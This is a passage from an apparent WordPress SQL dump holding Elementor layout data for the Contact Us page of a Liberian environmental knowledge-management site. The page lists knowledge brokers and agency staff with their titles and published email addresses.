Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19798,2896,'_elementor_edit_mode','builder'),(19799,2896,'_elementor_template_type','wp-page'),(19800,2896,'_elementor_version','2.7.5'),(19801,2896,'_wp_page_template','default'),(19802,2896,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. 